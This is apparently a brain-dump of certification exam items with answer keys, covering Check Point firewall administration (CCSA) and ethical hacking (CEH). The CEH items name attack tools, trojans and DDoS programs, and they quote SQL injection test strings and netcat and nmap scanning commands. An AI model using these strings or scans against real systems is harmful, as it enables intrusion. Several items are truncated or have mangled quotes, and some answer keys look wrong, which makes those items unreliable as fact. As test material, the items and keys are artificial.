B 	#CCSA Q55. Which of the following describes the behavior of VPN1 NG? ^A.  Traffic not expressly prohibited is permitted. ^B.  Traffic not expressly permitted is prohibited. ^C.  TELNET, SMTP and HTTP are allowed by default. ^D.  Secure connections are authorized by default, unsecured connections are not. ^E.  All traffic is controlled by explicit rules. 
E 	#CCSA Q56. New users are created from templates. What is the name of the standard template from which you would create a new user? ^A.  New ^B.  User ^C.  Group ^D.  Standard User. ^E.  Default 
B 	#CCSA Q57. In a distributed management environment, the firewall administrator has removed the default check from Accept VPN1 control connections under the Security Policy tab of the properties setup dialogue box. ^  In order for the management module and the Firewall to communicate, you must create a rule to allow the Management Module to communicate to the firewall on which port? ^A.  80 ^B.  256 ^C.  259 ^D.  900 ^E.  23 
B 	#CCSA Q58. What is the command for installing a Security Policy from a *.W file? ^A.  Fw gen and then the name of the .W file. ^B.  Fw load and then the name of .W file. ^C.  Fw regen and then the name of the .W file. ^D.  Fw reload and then the directory location of the .W file. ^E.  Fw import and then the name of the .W file. 
B 	#CCSA Q59. In the Check Point Configuration Tool, you create a GUI administrator with Read Only privileges.   ^  This allows the Firewall-1 administrator for the authorized GUI client (GUI workstation) privileges to change network object, and create and install rules. ^A.  True ^B.  False 
D 	#CCSA Q60. Hybrid Authentication allows VPN1 NG to authenticate SecuRemote/SecureClient, using which of the following? ^A.  RADIUS ^B.  3DES ^C.  TACACS ^D.  Any authentication method supported by VPN1. ^E.  Both A and C. 
E 	#CCSA Q61. In order to install a new Security Policy on a remote firewall, what command must be issued on the remote firewall? ^A.  Fw unload all all. ^B.  Fw load new. ^C.  Cp clear policy. ^D.  None of the above, the command cp policy remove is issued from the manager.     ^E.  None of the above, the new policy will automatically overwrite the existing policy. 
A 	#CCSA Q62. As a firewall administrator if you want to log packets dropped by "implicit drop anything not covered" rules, you must explicitly define a Clean-up rule. This must be the last rule in the rule base. ^A.  True ^B.  False
A 	#CCSA Q63.  Fully Automatic Client authentication provides authentication for all protocols, whether supported by these protocols or not. ^A.  True ^B.  False 
B 	#CCSA Q64. VPN1 NG differs from Packet filtering and Application Layer Gateways, because? ^A.  VPN1 NG provides only minimal logging and alerting mechanism. ^B.  VPN1 NG uses Stateful inspection which allows packet to be examined at the top of the layers of the OSI model. ^C.  VPN1 NG has access to a limited part of the packet header only. ^D.  VPN1NG requires a connection from a client to a firewall and firewall to a server. ^E.  VPN1 NG has access to packets passing through key locations in a network. 
A 	#CCSA Q65. AlphaBravo Corp has 72 privately addressed internal addresses. Each network is a piece of the 10-net subnetted to a class C address. ^   AlphaBravo uses Dynamic NAT and hides all of the internal networks behind the external IP addresses of the Fire
C 	#CCSA Q66. How does VPN1 NG implement Transparent authentication? ^A.  Unknown user receive error messages indicating that the firewalled gateway does not know the user names on the gateway. ^B.  VPN1 NG prompts for user names even through the authentication data may not be recognized by the firewall's user database. ^C.  VPN1 NG allows connections, but hides the firewall from authenticated users. ^D.  Unknown users error messages indicating that the host does not know the users names on the server. ^E.  VPN1 NG does not allow connections from users who do not know the name of the firewall. 
B 	#CCSA Q67. When creating user authentication rule, select intersect with user database for source and destination to allow access according to the source specified in the rules. ^A.  True ^B.  False 
C 	#CCSA Q69. Which of the following statements about Client Authentication are FALSE? ^A. In contrast to User Authentication, which allows access per user, Client Authentication allows access per IP address. ^B. Authentication is by user name and password, but it is the host machine (client) that is granted access. ^C. Client Authentication is more secure than User Authentication, because it allows multiple users and connections from an authorized IP address or host. ^D. Client Authentication enables administration to grant access privileges to a specific IP address after successful authentication. 
B 	#CCSA Q70. When you make a rule, the rule is not enforced as part of your Security Policy. ^A.  True ^B.  False 
E 	#CCSA Q71. Which of the following user actions would you insert as an INTERNAL Authentication scheme? ^A.  The user enters the security dynamics passcode. ^B.  The user prompted for a response from the RADIUS server. ^C.  The user prompted for a response from the AXENT server.  ^D.  The user prompted for a response from the TACACS server. ^E.  The user enters an operating system account password. 
A 	#CCSA Q72. When configuring Static NAT, you cannot map the routable IP address to the external IP address of the Firewall; if attempted, the security policy installation fails with the following error "rule X conflicts with rule Y". ^A.  True ^B.  False
B 	#CCSA Q73. The advantage of client authentication is that it can be used for any number of connections and for any services, but authentication is only valid for a specified length of time. ^A.  True ^B.  False 
A 	#CCSA Q74. You have set up Static NAT on a VPN1 to allow Internet traffic to an internal web server. ^  You notice that any HTTP attempts to that machine are being dropped in the log due to rule 0. ^  Which of the following is the most likely cause? ^A.  Spoofing on the internal interface is set to Network defined by Interface IP and Net Mask. ^B.  Spoofing on the external interface is set to Not Defined. ^C.  You do NOT have a rule that allows HTTP access to the internal Web Server. ^D.  You do NOT have a rule that allows HTTP from the Web Server to Any destination. ^E.  None of the above. 
C 	#CCSA Q75. As a firewall administrator, you are required to create VPN1 users for authentication. ^  When you create a user for user authentication, the data is stored in the? ^A.  Inspect Engine.   ^B.  Rule base. ^C.  Users database    ^D.  Rulebase fws file ^E.  Inspect module. 
A 	#CCSA Q76. If users authenticated successfully, they have matched the User and Authentication rule restriction of the user group to which they belong. ^A.  True ^B.  False 
B 	#CCSA Q77. The only way to unblock BLOCKED connections is by deleting all the blocking rules from the Rule base. ^A.  True ^B.  False 
B 	#CCSA Q78. When you perform a cp fetch, what can you expect from this command? ^A.  Firewall retrieves the user database from the tables on the Management Module. ^B.  Firewall retrieves the inspection code from the remote Management Module and installs it to the kernel. ^C.  Management module retrieves the IP address of the target specified in the command. ^D.  Management module retrieves the interface information for the target specified in the command. ^E.  None of the above. 
B 	#CCSA Q79. Each incoming UDP packet is looked up in the list of pending connections. Packets are delivered if they are _________. ^A.  A request. ^B.  A response to a request.     ^C.  Source routed. ^D.  Allowed by the Rule Base. ^E.  Both B and D 
E 	#CCSA Q80. Assume an NT system. What is the default expiration for a Dynamic NAT connection NOT  showing any TCP activity? ^A.  30 Seconds.   ^B.  60 Seconds.    ^C.  330 Seconds. ^D.  660 Seconds.  ^E.  3600 Seconds. 
B 	#CCSA Q81. When you disable a rule the rule is NOT disabled until you verify your Security Policy. ^A.  True ^B.  False 
B 	#CCSA Q82. Static Source NAT translates public internal source IP addresses to private external source IP addresses. ^A.  True ^B.  False
B 	#CCSA Q83. What is the command that lists the interfaces to which VPN1 is bound? ^A.  Fw ctl iflist ^B.  Ifconfig -a  ^C.  Ifconfig \all ^D.  Netstat -m ^E.  Cp bind -all 
B 	#CCSA Q84. Your customer has created a rule so that every time a user wants to go to Internet, that user must be authenticated. ^   Which of the following is the best authentication method for roaming users, such as doctors updating patient records at various floor stations in a hospital? ^A.  Session ^B.  User ^C.  Client ^D.  Connection ^E.  None of the above. 
C 	#CCSA Q85. Which command utility allows verification of the Security Policy installed on a firewall module? ^A.  Fw ctl pstat. ^B.  Fw printlic.  ^C.  Fw stat. ^D.  Fw ver. ^E.  Fw pol. 
E 	#CCSA Q86. You are a firewall administrator with one Management Server managing 3 different Enforcement Modules. ^  One of the Enforcement Modules does NOT show up in the dialog box when attempting to install a Security Policy. Which of the following is the most likely cause? ^A.  No master file was created. ^B.  License for multiple firewalls has expired. ^C.  The firewall has NOT been rebooted. ^D.  The firewall was NOT listed in the Install On column of the rule. ^E.  The firewall is listed as "Managed by another Management Module (external)" in the Workstation Properties dialog box. 
B 	#CCSA Q87. In the Install On column of a rule, when you select a specific firewall object as the only configuration object, that rule is enforced on all firewalls within the network, with related configurations. ^A.  True ^B.  False
E 	#CCSA Q88. As an administrator, you want to force your users to authenticate. You have selected Client Authentication as your authentication scheme. ^  Users will be using a Web browser to authenticate. On which TCP port will authentication be performed? ^A.  23  ^B.  80  ^C.  259 ^D.  261 ^E.  900 
A 	#CCSA Q90. Client Authentication rules should be placed above the Stealth rule, so users can authenticate to the firewall. ^A.  True ^B.  False 
B 	#CCSA Q91. The following rule base tells you any automatically created NAT rules have simply hidden but have not been deleted from the Rule Base. ^A.  True ^B.  False 
B 	#CCSA Q92. You are using static Destination NAT. You have VPN1 NG running on Windows NT/Solaris platform. ^  By default, routing occurs after the address translation when the packet is passing from the client towards the server. ^A.  True ^B.  False 
D 	#CCSA Q93. Which of the following statements is FALSE? ^A.  Dynamic NAT cannot be used for protocols where the port number cannot be changed. ^B.  Dynamic NAT cannot be used when an external server must distinguish between clients based on their IP addresses. ^C.  With Dynamic NAT, packet's source port numbers are modified. ^D.  In Dynamic NAT, public internal addresses are hidden behind a single private external address using dynamically assigned port numbers to distinguish between them. ^E.  Dynamically assigned port numbers are used to distinguish between hidden private addresses. 
B 	#CCSA Q94.  When you modify a User Template, any users already operating under that template will be updated to the new template properties. ^A.  True ^B.  False 
A 	#CCSA Q95.  Installation time for creating network objects will decrease if you list machine names and IP addresses in the hosts files. ^A.  True ^B.  False 
C#CEH Q.1 If your concern is hackers coming across the firewall and using SMB session hijacking, ^  you can block that by not allowing UDP ports __________ as well as TCP ports _________ from coming through the firewall. ^  (Select the Best Answer)^A.	167, 345 and 123 and 137^B.	80, 21 and 23, 110^C.	137, 138 and 139, 445^D.	1277, 1270 and 80, 21
D#CEH Q.2 Microsoft has maintained backward compatibility with its older dialects. This backward compatibility means that when a SMB session is initiated, a more primitive plain text level of authentication can often be negotiated that provides for maximum exposure of the password data. ^  Because SMB was developed to facilitate file and print sharing on local networks, a Windows client will automatically attempt to log onto an SMB server. ^  In the process, the host and client will exchange password hashes. ^  These pairs of password hashes, the challenge from the host plus the response from the client, can be sniffed and saved for later cracking by using which of the following hacking tools? (Select the Best Answer)^A.	SMBRelay^B.	ObiWan^C.	Hunt^D.	L0phtcrack^E.	NBTCracker
C#CEH Q.3 How do you prevent SMB Hijacking in Windows operating systems? (Select the Best Answer)^A.	Install WINS Server and configure secure authentication.^B.	Disable NetBIOS over TCP/IP in Windows NT and 2000.^C.	The only effective way to block SMB hijacking is to use SMB signing.^D.	Configure 128-bit SMB credentials key-pair in TCP/IP properties.
B#CEH Q.4 This tool is a free network protocol analyzer for Unix and Windows. It allows you to examine data from a live network or from a capture file on disk. ^  You can interactively browse the capture data, viewing summary and detail information for each packet. ^  This tool has several powerful features, including a rich display filter language and the ability to view the reconstructed stream of a TCP session. (Select the Best Answer)^A.	Port Scan plus^B.	Ethereal^C.	Sam Spade^D.	Lp0Crack
D#CEH Q.5 What is a packet sniffer? (Select the Best Answer)^A.	A packet sniffer is a keyboard logger that plugs into computer networks and captures passwords.^B.	A packet sniffer is a packet blocker firewall that plugs into computer networks and generates packets.^C.	A packet sniffer is an Intrusion Detection System that monitors real time hacking events.^D.	A packet sniffer is a wire-tap device that plugs into computer networks and eavesdrops on the network traffic.
ALL#CEH Q.6 What protocols are vulnerable to sniffing? (Select all that apply)^A.	Telnet and rlogin^B.	HTTP^C.	SNMP^D.	NNTP^E.	POP^F.	FTP^G.	IMAP
A#CEH Q.8 If you want to get a list of all the IP addresses as well as aliases assigned within a domain, you can grab that information if the DNS server allows zone transfers. ^  The zone transfer is the method a secondary DNS server uses to update its information from the primary DNS server. DNS servers within a domain are organized using a master-slave method where the slaves get updated DNS information from the master DNS. ^  Which nslookup command will dump all available records, assuming zone transfers are enabled? (Select the Best Answer)^A.	>set type=any > ls -d eccouncil.org >ns.eccouncil.org >exit^B.	< list=any < lc -x eccouncil.org< dns.eccouncil.org< exit^C.	< set type=any < dir -c eccouncil.org< dns.eccouncil.org< exit^D.	< set type=any < list report eccouncil.org< dns.eccouncil.org< exit^E.	< set type=any < dns -ls eccouncil.org< dns.eccouncil.org< exit
B#CEH Q.9 Let's imagine three companies (A, B and C), all competing in a challenging global environment. Company A and B are working together in developing a product that will generate a major competitive advantage for them. ^  Company A has a secure DNS server while company B has a DNS server vulnerable to spoofing. With a spoofing attack on the DNS server of company B, company C gains access to outgoing e-mails from company B. ^  How do you prevent DNS spoofing? (Select the Best Answer)^A.	Disable DNS Mail Relay.^B.	Disable DNS Zone Transfer.^C.	Install DNS logger and track vulnerable packets.^D.	Install DNS Anti-spoofer
A#CEH Q.10 Douglas Brown discovered a new worm that targets Microsoft SQL Server installations where the SQL Administrator password is blank (note that this is the default configuration for SQL Server 2000 and earlier). ^  The worm logs in using the Administrator account, then calls a command shell to FTP and install a Trojan. The Trojan communicates with the attacker via IRC, where the attacker is able to utilize the infected systems to launch Distributed Denial of Service (DDoS) attacks. ^  You would like to port scan all the SQL Servers that are vulnerable to this attack in your organization. Which port number you will scan for? (Select the Best Answer)^A.	1433^B.	1432^C.	1434^D.	1435
B#CEH Q.11 This hacking tool runs as a Windows OS stack and hides itself from netstat command. Any directory or file that starts with '_root_' will be hidden. Any process that starts with '_root_' will be hidden. (Select the Best Answer)^A.	WINOS Trojan^B.	NT Rootkit^C.	NubUs^D.	Back Orrifice
B#CEH Q.12 This Linux program is a daemon intended to catch someone installing a rootkit or running a packet sniffer. ^  It is designed to run continually with a small footprint under an innocuous name. ^  When triggered, it sends email, appends to a logfile, and disables networking or halts the system. It is designed to install with the minimum of disruption to a normal multiuser system, and should not require rebuilding with each kernel change or system upgrade. (Select the Best Answer)^A.	cheops^B.	chkrootkit^C.	desps^D.	qswatcher
D#CEH Q.13 What does the tool MP3Stego do? (Select the Best Answer)^A.	MP3Stego adds watermark to music data in MP3 files during the compression process.^B.	MP3Stego encrypts music in MP3 files during the compression process.^C.	MP3Stego adds images in MP3 files during the compression process.^D.	MP3Stego hides information in MP3 files during the compression process.
B#CEH Q.14 This hacking tool when placed over a web page reveals password displayed as "*****". (Select the Best Answer)^A.	NAT^B.	SnadBoy^C.	Password Revealer^D.	MugBoy
A#CEH Q.15 How long will it take to crack a password using straight dictionary attack (3 million words) on a single 1.5 GHz Intel Pentium machine? (Select the Best Answer)^A.	2.5 mins^B.	13.6 days^C.	4.2 hours^D.	4.6 days
C#CEH Q.16 This tool is a remote scanner for the most common Distributed Denial of Service programs. These were the programs responsible for the recent rash of attacks on high profile web sites such as Yahoo, Amazon, eBay. ^  This tool will detect Trinoo, Stacheldraht and Tribe Flood Network programs running with their default settings. (Select the Best Answer)^A.	DDoScanner^B.	DoSMinger^C.	DDoSPing^D.	DDoSKiller
B#CEH Q.17 This tool from GFI is a freeware security scanner to audit your network security. It scans entire networks and provides NETBIOS information for each computer such as hostname, shares, logged on user name. ^  It does OS detection, tests password strength, detects registry issues. Reports are outputted in HTML. ^  This tool checks the network for all potential methods that a hacker might use to attack a network. ^  By analyzing the operating system and the applications running on your network, it identifies possible security holes in the network. In other words, it plays the devil's advocate and alerts weaknesses before a hacker can find them, enabling the administrator to deal with these issues before a hacker can exploit them.(Select the Best Answer)^A.	SAN Secure Scanner^B.	LANGuard Network Scanner^C.	GFI Guard^D.	Sentinel Scanner
B#CEH Q.18 The tool MingSweeper. What is it used for? (Select the Best Answer)^A.	MingSweeper is a session hijacking tool.^B.	MingSweeper is a network reconnaissance tool.^C.	MingSweeper is an ARP poisoning tool.^D.	MingSweeper is a port scanner.
A#CEH Q.19 What does the hacking tool NetCat do? (Select the Best Answer)^A.	NetCat is called the TCP/IP swiss army knife. It is a simple Unix utility which reads and writes data across network connections using TCP or UDP protocol.^B.	NetCat is a powerful tool for network monitoring and data acquisition. This program allows you to dump the traffic on a network. It can be used to print out the headers of packets on a network interface that matches a given expression.^C.	NetCat is a flexible packet sniffer/logger that detects attacks. NetCat is a libpcap-based packet sniffer/logger which can be used as a lightweight network intrusion detection system.^D.	NetCat is a security assessment tool based on SATAN (Security Administrator's Integrated Network Tool).
C#CEH Q.20 What is Whisker? (Select the Best Answer)^A.	Whisker is a Trojan virus.^B.	Whisker is an application scanner.^C.	Whisker is a CGI vulnerability scanner^D.	Whisker is a SNMP dumping tool.
D#CEH Q.21 This tool is a file and directory integrity checker. It aids system administrators and users in monitoring a designated set of files for any changes. Used with system files on a regular (e.g., daily) basis, ^  it can notify system administrators of corrupted or tampered files, so damage control measures can be taken in a timely manner. (Select the Best Answer)^A.	Hping2^B.	DSniff^C.	Cybercop Scanner^D.	Tripwire
C#CEH Q.22 This is a network tool able to send custom ICMP/UDP/TCP packets and to display target replies like ping does with ICMP replies. ^  It handles fragmentation and arbitrary packet body and size, and can be used to transfer files under supported protocols. ^  Using this tool, you can: test firewall rules, perform [spoofed] port scanning, test net performance using different protocols, packet size, TOS (type of service), and fragmentation, do path MTU discovery, transfer files (even between really Fascist firewall rules), perform traceroute-like actions under different protocols, fingerprint remote OSs, audit a TCP/IP stack, etc. (Select the Best Answer)^A.	Nemesis^B.	Lids^C.	Hping2^D.	Cybercop Scanner
B#CEH Q.23 WinTrinoo is an example of: (Select the Best Answer)^A.	Firewall^B.	DDoS Attack tool^C.	Virus Scanner^D.	Trojan Program
B#CEH Q.24 Which of the following Nmap commands launches a stealth SYN scan against each machine that is up out of the 255 machines on class C where target.example.com resides and tries to determine what operating system is running on each host that is up and running? (Select the Best Answer)^A.	nmap -v target.example.com^B.	nmap -sS -O target.example.com/24^C.	nmap -sX -p 22,53,110,143,4564 198.116.*.1-127^D.	nmap -XS -O target.example.com
A#CEH Q.26 Snort is a Linux based Intrusion Detection System. Which command enables Snort into network intrusion detection (NIDS) mode assuming snort.conf is the name of your rules file and the IP address is: 192.168.1.0 with Subnet Mask:255.255.255.0? (Select the Best Answer)^A.	./snort -c snort.conf 192.168.1.0/24^B.	./snort 192.168.1.0/24 -x snort.conf^C.	./snort -dev -l ./log -a 192.168.1.0/8 -c snort.conf^D.	./snort -dev -l ./log -h 192.168.1.0/24 -c snort.conf
C#CEH Q.27 Many web based authentication models revolve around solely trusting cookies for verification of a user's session. If a malicious person can obtain a user's cookies for a service, then he can use those cookies to access the victim's account. ^  Pages that can use a server's cookies are limited to that particular server, or higher-level domain servers (like hotmail.passport.com for '.passport.com' cookies). ^  In order for a malicious person to obtain a victim's cookies for a site, he must manufacture a fake javascript that must execute within a page from that same domain. ^  This is done by manipulating the error messages that are returned, either from 404 requests or form elements that are echoed back to the screen unescaped. For example, by sending a web-mail user an email with a link to the very same server, the link looks harmless, and it can trick the user into clicking on the link, thus running the embedded javascript and sending his cookies to the malicious person. How do you prevent this type of cookie hijacking? (Select the Best Answer)^A.	Escaping all form data that is echoed to the screen and not echoing 404 file requests eliminates this problem.^B.	Setting up some secondary authentication requirement other than cookie information would at least make this session-stealing problem a lesser threat.^C.	Enabling SSL on all the authentication pages will solve the problem.^D.	Implement 128-bit cookie security on all your sessions with the client browser.
A#CEH Q.28 Windows 2000 and NT4 IIS .ASP Remote Buffer Overflow. A vulnerability in the ASP (Active Server Pages) ISAPI filter, loaded by default on all NT4 and Windows 2000 server systems (running IIS), can be exploited to remotely execute code of an attacker's choice. ^  The fault lies within the decoding and interpretation of form data received by malicious clients. ^  By chunk encoding form data we can force IIS to overwrite 4 bytes of arbitrary memory with data we supply. This is a very serious vulnerability and Microsoft suggests that administrators install the supplied patch as soon as possible. ^  What is the patch number, which fixes this bug in IIS? (Select the Best Answer)^A.	Microsoft Security Bulletin MS02-018^B.	Microsoft Security Bulletin MS02-456^C.	Microsoft Security Bulletin MS02-056^D.	Microsoft Security Bulletin MS02-234
E#CEH Q.29 tini is a simple and very small (3kb) trojan backdoor for Windows, coded in assembler. It listens at TCP port and connects via remote Command Prompt. What port number does it listen on by default? (Select the Best Answer)^A.	3333^B.	4444^C.	5555^D.	6666^E.	7777
C#CEH Q.30 Which of the following programs is capable of detecting and removing more than 1000 Trojan Horses from your system? (Select the Best Answer)^A.	NuBuS^B.	SubSeven^C.	Tauscan^D.	BO^E.	Tini^F.	TrojanKiller
D#CEH Q.31 What is Zombie Zapper? (Select the Best Answer)^A.	Zombie Zapper is a DDoS tool that installs on a victim's machine as "zombie".^B.	Zombie Zapper is a firewall, which works on Linux and Solaris OS.^C.	Zombie Zapper is a trojan that listens on port 2345.^D.	Zombie Zapper is a free, open source tool that can tell a zombie system flooding packets to stop flooding.
B,C#CEH Q.32 Which of the following are examples of Distributed Denial of Service (DDoS) attack tools? (Select all that apply)^A.	WinTrinoo^B.	TFN2K^C.	Stacheldraht^D.	Knight^E.	Kayton^F.	GTBot
B#CEH Q.33 Netcat is a simple network utility which reads and writes data across network connections, using TCP or UDP protocol. Which of the following commands scans for open ports between [1 - 140]? (Select the Best Answer)^A.	nc -xx -q -w2 my-attacker-IP-address [1-140]^B.	nc -vv -z -w2 my-attacker-IP-address 1-140^C.	nc my-attacker-IP-address (1,140)^D.	nc 140 my-attacker-IP-address -vv
B#CEH Q.34 This network tool is a comprehensive packet analyzer for IEEE 802.11 wireless LANs, supporting all higher level network protocols such as TCP/IP, AppleTalk, NetBEUI and IPX. ^  This tool isolates security problems, fully decodes 802.11a and 802.11b WLAN protocols, and analyzes wireless network performance with accurate identification of signal strength, channel and data rates. (Select the Best Answer)^A.	AeroSeek^B.	AiroPeek^C.	AirMan^D.	AirCell^E.	AirWire
D#CEH Q.35 Which of the following is a wireless LAN (WLAN) tool which recovers encryption keys. (Select the Best Answer)^A.	AirPeek^B.	AirMan^C.	Airport^D.	AirSnort
D#CEH Q.36 "Anonymous web surfing" is a proxy server, which downloads the webpage you requested and then displays the web page to you through an encrypted URL. ^  Since your computer doesn't make a connection to the server, it brings it to you totally anonymous, and they have no idea you were there, and information about you and your computer isn't gathered by that website. ^  All you do is type in the web site you want to visit and you will be taken there promptly and securely. Which of the following web site provides free anonymous web surfing services? (Select the Best Answer)^A.	http://www.anoyume.com^B.	http://www.privacybusters.com^C.	http://www.badboys.com^D.	http://www.silenter.com
B#CEH Q.37 Which hacking tool exploits Microsoft Windows 2000 IIS 5.0 IPP ISAPI 'Host:' Buffer Overflow Vulnerability?(Select the Best Answer)^A.	IIS Lockdown^B.	Jill-32^C.	IPP Scanner^D.	IPP Exploit^E.	URLScan
C#CEH Q.38 Which of the following is a ramdisk-based Linux distribution that boots from a single floppy and loads its packages from an HTTP/FTP server? (Select the Best Answer)^A.	Red Hat Linux^B.	Turbo Linux^C.	Trinux^D.	Flopix^E.	Raminux
A#CEH Q.39 SQL injection is usually caused by developers who use "string-building" techniques in order to execute SQL code. For example, in a search page, the developer may use the following code to execute a query: ^  Set myRecordset = myConnection.execute("SELECT * FROM myTable WHERE someText ='" & request.form("inputdata") & "'") ^  Which of the following prevents SQL injection on a web page? (Select the Best Answer)^A.	For string data, replace single quotes with two single quotes using the replace function or equivalent : goodString = replace(inputString,','')^B.	For string data, replace double quotes with two single quotes using the replace function or equivalent: goodString = replace(inputString,'','')^C.	For string data, replace single quotes with asterisk using the replace function or equivalent: goodString = replace(inputString,',*)^D.	For string data, replace single quotes with two underscore characters using the replace function or equivalent: goodString = replace(inputString,',__)
D#CEH Q.40 How do you test SQL injection vulnerability on a Web page? (Select the Best Answer)^A.	Input "asterisk character" something like:^  hi* or 1=1-- ^  Into login, or password, or in the URL. Example:^  Login: hi* or 1=1--^  Pass: hi* or 1=1--^  http://duck/index.asp?id=hi* or 1=1- ^B.	Input "underscore character" something like:^  hi__ or 1=1--^  Into login, or password, or in the URL. Example:^  Login: hi__ or 1=1--^  Pass: hi__ or 1=1--^  http://duck/index.asp?id=hi__ or 1=1--^C.	Input "double quote" something like:^  hi'' or 1=1--^  Into login, or password, or in the URL. Example:^  Login: hi'' or 1=1--^  Pass: hi'' or 1=1--^  http://duck/index.asp?id=hi'' or 1=1--^D.	Input "single quote" something like:^  hi' or 1=1--^  Into login, or password, or in the URL. Example:^  Login: hi' or 1=1--^  Pass: hi' or 1=1--^  http://duck/index.asp?id=hi' or 1=1--
A#CEH Q.41 Which of the following is a dictionary attack tool for Microsoft SQL Server, which lets you test if the login accounts are strong enough to resist an attack? (Select the Best Answer)^A.	SQLdict^B.	SQLAttack^C.	SQLWalker^D.	C-Q-L-HACK
B#CEH Q.42 Which of the following is a hacking tool that has the ability to hijack TCP sessions? For example, you can capture the contents of a Telnet session and spy on what a person is doing, or hijack the session and start typing in your own commands. (Select the Best Answer)^A.	JungleBungle^B.	Juggernaut^C.	SesHijack^D.	TCP Kidnapper
A#CEH Q.43 Smurf attacks are the easiest distributed DOS attack to commit. ^  In its simplest form, the attacker begins by using a commonly available program to scan the Internet to locate routers that allow entry to broadcast pings. ^  When he or she locates this kind of router, the next step is to forge ping packets with the origination address of the intended victim. This is done using packet manipulation tools. ^  This type of attack can also use other Internet Control Message Protocol (ICMP) techniques. ^  To avoid arrest, the attacker will typically use a hacked computer to send out these forged ping packets. ^  These packets are then sent to the network behind the vulnerable router. ^  Each computer on this network echoes each attacking ping out to the victim designated in the ping's forged header. ^  So if there are two hundred computers on this intermediary network, for every single ping of the attacking computer, they will send 200 pings out to the victim. ^  How do you defend against this type of Smurf attack? (Select the Best Answer)^A.	deny broadcast pings at the intermediary network's border router.^B.	deny ICMP at the intermediary network's border router.^C.	deny smurf 34.6 type frames at the firewall.^D.	enable broadcast pings at the intermediary network's border router.
D#CEH Q.44 Which tool detects the presence of Trinoo, TFN, or Stacheldraht clients on your machine? (Select the Best Answer)^A.	DDoS Detector^B.	TrinooBuster^C.	TFNKiller^D.	RID
C#CEH Q.45 Trinoo is a dangerous distributed tool used to launch coordinated UDP flood denial of service attacks from many sources. A trin00 network consists of a small number of servers, or masters, and a large number of clients, or daemons. ^  The denial of service attack utilizing a trin00 network is carried out by an intruder connecting to a trin00 master and instructing that master to launch a denial of service attack against one or more IP addresses. The trin00 master then communicates with the daemons giving instructions to attack one or more IP addresses for a specified period of time. What default port does the master send UDP broadcast packets to the daemon on? (Select the Best Answer)^A.	27445^B.	27447^C.	27444^D.	27449
C#CEH Q.46 Buffer overflow attacks exploit a lack of bounds checking on the size of input being stored in a buffer array. ^  By writing data past the end of an allocated array, the attacker can make arbitrary changes to program state stored adjacent to the array. How do you protect your system from buffer overflow exploits? (Select the Best Answer)^A.	Install a firewall system which protects from buffer overflow exploits.^B.	Install an IDS system which protects from buffer overflow exploits.^C.	Proper OS Patch maintenance is the best way to protect your systems from the buffer overflow attack.^D.	Proper virus pattern maintenance is the best way to protect your systems from the buffer overflow attack.
D#CEH Q.47 First appearing on September 18, 2001, Nimda is a computer virus that caused traffic slowdowns as it rippled across the Internet, spreading through four different methods, infecting computers containing Microsoft's Web server, Internet Information Server (IIS), and computer users who opened an e-mail attachment. ^  Like a number of predecessor viruses, Nimda's payload appears to be the traffic slowdown itself - that is, it does not appear to destroy files or cause harm other than the considerable time that may be lost to the slowing or loss of traffic known as denial-of-service and the restoring of infected systems. With its multi-pronged attack, Nimda appears to be the most troublesome virus of its type that has yet appeared. Nimda virus refers to a file that, when run, continues to propagate the virus. What is the name of this file? (Select the Best Answer)^A.	cmd.exe^B.	patch.exe^C.	explorer.dll^D.	admin.dll
B#CEH Q.48 What buffer overflow vulnerability does Nimda virus exploit to gain access to IIS servers? (Select the Best Answer)^A.	Internet Printing Protocol (IPP)^B.	ISAPI DLL^C.	Windows 2000 KRNLOS.EXE^D.	IIS SMTP Services
A#CEH Q.50 This is a Novell Netware hacking tool which simulates a Novell file server. The server will be visible for about 1 to 2 minutes. ^  On some systems the server will be visible for as long as the program is running. (Select the Best Answer)^A.	Novelffs^B.	Novell Faker^C.	Noveknell^D.	Novell Detector
C#CEH Q.51 Digging into the rubbish bin to find pieces of information is an example of what attack (Select the Best Answer)^A.	Spoofing^B.	Social Engineering^C.	Dumpster Diving^D.	Information gathering
B,C#CEH Q.52 In a man-in-the-middle (MiTM)attack of a SSL connection sniffing, which of the following are true?^          Session Key A                     Session Key B^  Server -------------- middle man --------------- Client^  (Select all that apply)^A.	Session Key A is sent by middle man and encrypted by client public key^B.	Session Key B is sent by client and encrypted by middle man public key^C.	Session Key A is sent by middle man and encrypted by server public key^D.	Session Key B is sent by client and encrypted by client public key^E.	Session Key A is sent by middle man and encrypted by client private key^F.	Session Key B is sent by client and encrypted by server private key
D#CEH Q.53 Which of the following network connections is or are encrypted and cannot be sniffed by an attacker on the network? (Select the Best Answer)^A.	Telnet^B.	POP3^C.	NFS^D.	SSH^E.	SMTP
B#CEH Q.54 In the Linux BIND NXT bug remote root exploit attack, the hacker inserts the shell code in which of the following connections? (Select the Best Answer)^A.	UDP on victim port 53^B.	TCP on victim port 53^C.	UDP on victim port above 1024^D.	TCP on victim port above 1024
D#CEH Q.55 An attacker on a Linux system may be able to recover a removed file from a disk using which of the following techniques? (Select the Best Answer)^A.	if he knows the name of the removed file^B.	if he knows the date the file was removed^C.	if he knows the size of the file that was removed^D.	if he knows the inode value of the removed file
C#CEH Q.56 These are firewall filter rules configured on a Linux system:^  # set the default to deny all incoming network traffic^  /sbin/ipchains -P input DENY^  # Allow incoming TCP traffic^  /sbin/ipchains -A input -i eth0 -p tcp ! -y -s any/0 -j ACCEPT^  An attacker sends a huge packet targeted towards the Linux system. Which of the following attacks will the firewall not block? (Select all that apply)^A.	TCP connection scan^B.	Half connect()^C.	FIN scan^D.	Xmas scan^E.	Null scan
A#CEH Q.57 Which of the following filter rules configured on a Linux system will block all outgoing ssh and telnet traffic to the hosts of the IP range 192.168.0.0 to 192.168.39.255? (Select the Best Answer)^A.	ipchains -A output -p tcp -s any/0 -d 192.168.0.0/19 22:23 -j DENY -l^  ipchains -A output -p tcp -s any/0 -d 192.168.32.0/21 22:23 -j DENY -l^B.	iptables -A input -r ICMP -s any/0 -d 192.168.0.0/19 23:22 -j DENY -l^  iptables -A output -p tcp -s any/0 -d 192.168.32.0/21 23:22 -j DENY -l^C.	ipcommand -A output -p tcp -s permit/1 -d 192.168.0.0/19 22:23 -j ALLOW -l^  ipcommand -A output -p tcp -s permit/1 -d 192.168.32.0/21 22:23 -j ALLOW -l^D.	ipfilter -A output -p tcp -s any/0 -d 192.168.0.0/19 22:23 -j DENY -l^  ipfilter -A output -p tcp -s any/0 -d 192.168.32.0/21 22:23 -j DENY -l
